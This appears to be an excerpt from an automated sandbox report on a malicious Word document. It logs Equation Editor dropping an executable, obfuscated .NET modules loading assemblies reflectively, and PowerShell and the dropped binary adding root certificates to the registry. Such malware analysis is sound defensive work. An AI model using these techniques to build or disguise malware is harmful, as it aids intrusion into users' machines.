Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: credssp.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: na.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\na.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: na.doc Static file information: File size 2531309 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation

Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs .Net Code: vsx5rZLaxx System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.610000.0.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs .Net Code: vsx5rZLaxx System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.3660770.5.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00606666 push eax; ret 2_2_00606667
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00607669 push eax; ret 2_2_0060766B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060606A push ecx; ret 2_2_0060606B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060607A push ecx; ret 2_2_0060607B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060605A push ecx; ret 2_2_0060605B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060665E push ecx; ret 2_2_0060665F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060102A push eax; retn 005Fh 2_2_00601001
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060602F push ecx; ret 2_2_0060603B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060600A push ecx; ret 2_2_0060600B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00607C0E push edx; ret 2_2_00607C0F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060600F push ecx; ret 2_2_0060601B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00607C16 push edx; ret 2_2_00607C17
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605EED push edx; ret 2_2_00605EEF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006076C9 push ecx; ret 2_2_006076CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006076D1 push ecx; ret 2_2_006076D3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006060AA push ecx; ret 2_2_006060AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605AB6 push edx; ret 2_2_00605AB7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006060BA push ecx; ret 2_2_006060BB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060629E push eax; ret 2_2_0060629F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F8F44 push eax; retf 2_2_005F8F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005EF739 push esi; ret 2_2_005EF747
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605BE8 push edx; ret 2_2_00605BEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605BF0 push edx; ret 2_2_00605BF3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605FFA push ecx; ret 2_2_00605FFB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605FB8 push ecx; ret 2_2_00605FBB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00600FBA push eax; retn 005Fh 2_2_00601001
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_002B21E9 push ebx; iretd 7_2_002B21EA
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005690F8 pushfd ; retn 0050h 7_2_005690F9
Source: pKL9HXcZosWfPt1[1].exe.2.dr Static PE information: section name: .text entropy: 7.956972299171152
Source: cmnjgwhesilo61000.exe.2.dr Static PE information: section name: .text entropy: 7.956972299171152
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, gNQbaWLXsFaFvpBXJi.cs High entropy of concatenated method names: 'A1MERoALPq', 'GiHEt1Hr9h', 'KwyEqnGTFi', 'VeoEFK9lXd', 'gpLEaxnXY0', 'pkFqx5bHs7', 'M65qne5uXo', 'GJoqMUjjBq', 'zpKqe3ykUl', 'iQpq6ZHv6q'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, CBhtpuZu0niEWFG3RD.cs High entropy of concatenated method names: 'e5MqAX3kPe', 'SLmqQDsluC', 'rjbYJ7cfPj', 'XuXY2vpy45', 'st8YZ99L1C', 'fOAY3wg2xN', 'Iw7YUTx09q', 'SgBYIHenRP', 'h34Y7lviMZ', 'mJoYsCjsbb'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, lV3xFKccCDLii0K48Q.cs High entropy of concatenated method names: 'iuPwFPnNes', 'pXnwad1res', 'vmww1jHKSO', 'SgbwXVSKPO', 'I2RwCZSOV7', 'o8dwgMcWC2', 'xGasU0GJAuQZseLmNY', 'TZWRsL61575LQxHXhB', 'imWwwvBiAF', 'Q08wKGXcvi'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, rFI1jpkhIAM5j1q8U4.cs High entropy of concatenated method names: 'VCSOwoxDBl', 'Ry5OKGjGBa', 'lFYO5JiGPR', 'aFgOB6ZjWJ', 'CgBOtTRCud', 'NjXOqptwhF', 'hi7OEfp125', 'OO7pMxKjNv', 'vcNpe2oPof', 'f0Vp6HQ4Ip'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, FoIYebzQm2hqfWSd7X.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0nOT3ehp6', 'jioOCxGbc7', 'CNHOg57oXi', 'BlcOjLqOVO', 'DoOOpmSQXR', 'BDeOOckvLr', 'K0xOkHHP2W'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, qG8HKrNydjl44Zvrcy.cs High entropy of concatenated method names: 'ToString', 'EM6gm9T5Vu', 'SmYgGIKJdf', 'POegJiep7d', 'uGKg26KVuj', 'PbOgZtR3sP', 'jl5g3k8wXT', 'uQDgUq5b9v', 'dPfgIUmInk', 'Gaog7rE6v9'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Ue6mJ2s3lb0V1AYBRp.cs High entropy of concatenated method names: 'Dispose', 'ltXw6NZrJJ', 'OOTbG9JaEg', 'b4q44GyQFo', 'c7rwWq6p4l', 'VoowzRPxNg', 'ProcessDialogKey', 'aQUbuPGRpy', 'yaDbw4OZTY', 'T2DbbqVEgx'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, RhLUmQgqaEfGqR2hvw.cs High entropy of concatenated method names: 'hnJpyj7aNG', 'RM9pGGbHeq', 'QCYpJrd2Hr', 'ntbp2EyfC1', 'UOspvLorD4', 'F1ppZESVYw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, BV89Ny39oFva95VeBk.cs High entropy of concatenated method names: 'HibYo2lmaD', 'EdtYDw3Vfw', 'wO2Y9osDOY', 'dXvYdrGj6q', 'HSRYCchewG', 'oWQYghvhis', 'xIqYjaZ1uK', 'gNjYpfF21c', 'C8AYOwGECx', 'vudYkaqj3m'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs High entropy of concatenated method names: 'vjPKREFlQe', 'Kd1KBC6ToO', 'q3UKtUPnqc', 'd2BKYoHTP5', 'R4IKqgqXM6', 'RNBKEJoxll', 'rP5KFCXpSt', 'xTCKaF5Ln5', 'cr7KNP6fM5', 'AX4K1El6CM'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, yR4F7uBJmXcJCfaA9e.cs High entropy of concatenated method names: 'Q4MpBI4xHu', 'BdrptD2sjy', 'VRPpYVcN9N', 'KcQpq7cury', 'qytpEK9mK5', 'GWMpFGK1cU', 'iUnpaWRoRy', 'j5ZpNdubDn', 'jMvp1xugNM', 'zNipXoS9pA'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, fNsjdUyrnXvaMejHKy9.cs High entropy of concatenated method names: 'eOJOHrcED0', 'p6pOStTCnI', 'n2LOrL3s5t', 'Tr5OoCL6gA', 'ARtOA8ytJc', 'O8WODLsklC', 'PJMOQqKAAb', 'jNjO9Hwx23', 'bJeOdDVWvh', 'pRhOVoKNyD'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs High entropy of concatenated method names: 'f2htvXocjg', 'Qg2t0w5yGU', 'u6dth0dfFA', 'XmDtfnft9S', 'exNtx4y9fN', 'RULtnB62XS', 'w54tMMEHtY', 'ilvte88d0I', 'Y1et6FBMIR', 'jaqtWFVlnC'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, sMGxPejB33K4rx4e60.cs High entropy of concatenated method names: 'qC0j11vu2K', 'GHmjXXx72h', 'ToString', 'PdTjBWSJb1', 'Ql9jtLrUKK', 'fVmjYqY4vc', 'ew9jqy5lDb', 'bJFjEVEBdR', 'SHZjFESWjh', 'ixJjaEjB6d'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Lf7MXhdeXPWlJnHyOp.cs High entropy of concatenated method names: 'i2ICsm95uJ', 'LtOCLJwBxR', 'jjmCvZmcNf', 'AuWC07Bv7n', 'RqvCGYpVT0', 'CIZCJhnlcU', 'bBcC2WJUEq', 'umUCZLi7Bs', 'cbJC3bnWD1', 'h4mCUkPmdl'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, KK71ylRYJPdeoYpMtn.cs High entropy of concatenated method names: 'ycBT9AyCP7', 'j0NTdnfp1a', 'o0fTy158Tf', 'RriTGdjIJq', 'vHmT2YDqhn', 'O4TTZ813rL', 'U9jTUpe6Dn', 'n7oTIfkPF7', 'NnyTsy0TV9', 'n1pTmgniZE'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, qjttoFyyDt8gYvxevtf.cs High entropy of concatenated method names: 'ToString', 'cZ1kKaaDby', 'zUdk5tGSeC', 'no7kRlJrX7', 'vy4kBpgQUO', 'zQ0kt3VDr1', 'DyDkYEXShQ', 'egVkqKU9qU', 'UUYDIbHc4FHgyHFDxvS', 'xIp0TKHswrKIbyeyXLT'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, JpIAI22TPeuUCKgw8d.cs High entropy of concatenated method names: 'QErjekxGsZ', 'FXhjWQyDmo', 'uQupuUm1v5', 'S0RpwsuMRZ', 'f3Bjm4OOhC', 'vQxjL8L1ZE', 'i1fjiirOpo', 'RWCjvWaHgx', 'wwmj0uFIeH', 'naOjhQR9xY'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, CLs2kbe5U6HxbH6rln.cs High entropy of concatenated method names: 'omJrZCkSS', 'jeVoNhX4p', 'xyoDYsKFj', 'UxdQO28Iw', 'uIpdCS53K', 'T9fVMTmhm', 'WBwQXkVKTkThYvZHLr', 'RFLe8WPpMjZEWFxkU2', 'FrkpCpO16', 'UhWkcY0Hl'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Ur1wr2Gv8belLDObbn.cs High entropy of concatenated method names: 'wegFHqPAJM', 'XGlFSBl5yl', 'zqQFrTKaqr', 'YcLFo8ePl0', 'QhHFARDUvD', 'VCjFDpbGgb', 'wtbFQ0V1KY', 'RrfF9aT53D', 'UaGFdLNjZi', 'nsJFV0l2up'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, gNQbaWLXsFaFvpBXJi.cs High entropy of concatenated method names: 'A1MERoALPq', 'GiHEt1Hr9h', 'KwyEqnGTFi', 'VeoEFK9lXd', 'gpLEaxnXY0', 'pkFqx5bHs7', 'M65qne5uXo', 'GJoqMUjjBq', 'zpKqe3ykUl', 'iQpq6ZHv6q'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, CBhtpuZu0niEWFG3RD.cs High entropy of concatenated method names: 'e5MqAX3kPe', 'SLmqQDsluC', 'rjbYJ7cfPj', 'XuXY2vpy45', 'st8YZ99L1C', 'fOAY3wg2xN', 'Iw7YUTx09q', 'SgBYIHenRP', 'h34Y7lviMZ', 'mJoYsCjsbb'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, lV3xFKccCDLii0K48Q.cs High entropy of concatenated method names: 'iuPwFPnNes', 'pXnwad1res', 'vmww1jHKSO', 'SgbwXVSKPO', 'I2RwCZSOV7', 'o8dwgMcWC2', 'xGasU0GJAuQZseLmNY', 'TZWRsL61575LQxHXhB', 'imWwwvBiAF', 'Q08wKGXcvi'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, rFI1jpkhIAM5j1q8U4.cs High entropy of concatenated method names: 'VCSOwoxDBl', 'Ry5OKGjGBa', 'lFYO5JiGPR', 'aFgOB6ZjWJ', 'CgBOtTRCud', 'NjXOqptwhF', 'hi7OEfp125', 'OO7pMxKjNv', 'vcNpe2oPof', 'f0Vp6HQ4Ip'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, FoIYebzQm2hqfWSd7X.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0nOT3ehp6', 'jioOCxGbc7', 'CNHOg57oXi', 'BlcOjLqOVO', 'DoOOpmSQXR', 'BDeOOckvLr', 'K0xOkHHP2W'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, qG8HKrNydjl44Zvrcy.cs High entropy of concatenated method names: 'ToString', 'EM6gm9T5Vu', 'SmYgGIKJdf', 'POegJiep7d', 'uGKg26KVuj', 'PbOgZtR3sP', 'jl5g3k8wXT', 'uQDgUq5b9v', 'dPfgIUmInk', 'Gaog7rE6v9'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Ue6mJ2s3lb0V1AYBRp.cs High entropy of concatenated method names: 'Dispose', 'ltXw6NZrJJ', 'OOTbG9JaEg', 'b4q44GyQFo', 'c7rwWq6p4l', 'VoowzRPxNg', 'ProcessDialogKey', 'aQUbuPGRpy', 'yaDbw4OZTY', 'T2DbbqVEgx'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, RhLUmQgqaEfGqR2hvw.cs High entropy of concatenated method names: 'hnJpyj7aNG', 'RM9pGGbHeq', 'QCYpJrd2Hr', 'ntbp2EyfC1', 'UOspvLorD4', 'F1ppZESVYw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, BV89Ny39oFva95VeBk.cs High entropy of concatenated method names: 'HibYo2lmaD', 'EdtYDw3Vfw', 'wO2Y9osDOY', 'dXvYdrGj6q', 'HSRYCchewG', 'oWQYghvhis', 'xIqYjaZ1uK', 'gNjYpfF21c', 'C8AYOwGECx', 'vudYkaqj3m'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs High entropy of concatenated method names: 'vjPKREFlQe', 'Kd1KBC6ToO', 'q3UKtUPnqc', 'd2BKYoHTP5', 'R4IKqgqXM6', 'RNBKEJoxll', 'rP5KFCXpSt', 'xTCKaF5Ln5', 'cr7KNP6fM5', 'AX4K1El6CM'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, yR4F7uBJmXcJCfaA9e.cs High entropy of concatenated method names: 'Q4MpBI4xHu', 'BdrptD2sjy', 'VRPpYVcN9N', 'KcQpq7cury', 'qytpEK9mK5', 'GWMpFGK1cU', 'iUnpaWRoRy', 'j5ZpNdubDn', 'jMvp1xugNM', 'zNipXoS9pA'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, fNsjdUyrnXvaMejHKy9.cs High entropy of concatenated method names: 'eOJOHrcED0', 'p6pOStTCnI', 'n2LOrL3s5t', 'Tr5OoCL6gA', 'ARtOA8ytJc', 'O8WODLsklC', 'PJMOQqKAAb', 'jNjO9Hwx23', 'bJeOdDVWvh', 'pRhOVoKNyD'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs High entropy of concatenated method names: 'f2htvXocjg', 'Qg2t0w5yGU', 'u6dth0dfFA', 'XmDtfnft9S', 'exNtx4y9fN', 'RULtnB62XS', 'w54tMMEHtY', 'ilvte88d0I', 'Y1et6FBMIR', 'jaqtWFVlnC'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, sMGxPejB33K4rx4e60.cs High entropy of concatenated method names: 'qC0j11vu2K', 'GHmjXXx72h', 'ToString', 'PdTjBWSJb1', 'Ql9jtLrUKK', 'fVmjYqY4vc', 'ew9jqy5lDb', 'bJFjEVEBdR', 'SHZjFESWjh', 'ixJjaEjB6d'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Lf7MXhdeXPWlJnHyOp.cs High entropy of concatenated method names: 'i2ICsm95uJ', 'LtOCLJwBxR', 'jjmCvZmcNf', 'AuWC07Bv7n', 'RqvCGYpVT0', 'CIZCJhnlcU', 'bBcC2WJUEq', 'umUCZLi7Bs', 'cbJC3bnWD1', 'h4mCUkPmdl'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, KK71ylRYJPdeoYpMtn.cs High entropy of concatenated method names: 'ycBT9AyCP7', 'j0NTdnfp1a', 'o0fTy158Tf', 'RriTGdjIJq', 'vHmT2YDqhn', 'O4TTZ813rL', 'U9jTUpe6Dn', 'n7oTIfkPF7', 'NnyTsy0TV9', 'n1pTmgniZE'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, qjttoFyyDt8gYvxevtf.cs High entropy of concatenated method names: 'ToString', 'cZ1kKaaDby', 'zUdk5tGSeC', 'no7kRlJrX7', 'vy4kBpgQUO', 'zQ0kt3VDr1', 'DyDkYEXShQ', 'egVkqKU9qU', 'UUYDIbHc4FHgyHFDxvS', 'xIp0TKHswrKIbyeyXLT'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, JpIAI22TPeuUCKgw8d.cs High entropy of concatenated method names: 'QErjekxGsZ', 'FXhjWQyDmo', 'uQupuUm1v5', 'S0RpwsuMRZ', 'f3Bjm4OOhC', 'vQxjL8L1ZE', 'i1fjiirOpo', 'RWCjvWaHgx', 'wwmj0uFIeH', 'naOjhQR9xY'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, CLs2kbe5U6HxbH6rln.cs High entropy of concatenated method names: 'omJrZCkSS', 'jeVoNhX4p', 'xyoDYsKFj', 'UxdQO28Iw', 'uIpdCS53K', 'T9fVMTmhm', 'WBwQXkVKTkThYvZHLr', 'RFLe8WPpMjZEWFxkU2', 'FrkpCpO16', 'UhWkcY0Hl'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Ur1wr2Gv8belLDObbn.cs High entropy of concatenated method names: 'wegFHqPAJM', 'XGlFSBl5yl', 'zqQFrTKaqr', 'YcLFo8ePl0', 'QhHFARDUvD', 'VCjFDpbGgb', 'wtbFQ0V1KY', 'RrfF9aT53D', 'UaGFdLNjZi', 'nsJFV0l2up'

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 2B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 2640000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 570000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 5EA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 6EA0000 memory reserve | memory write watch
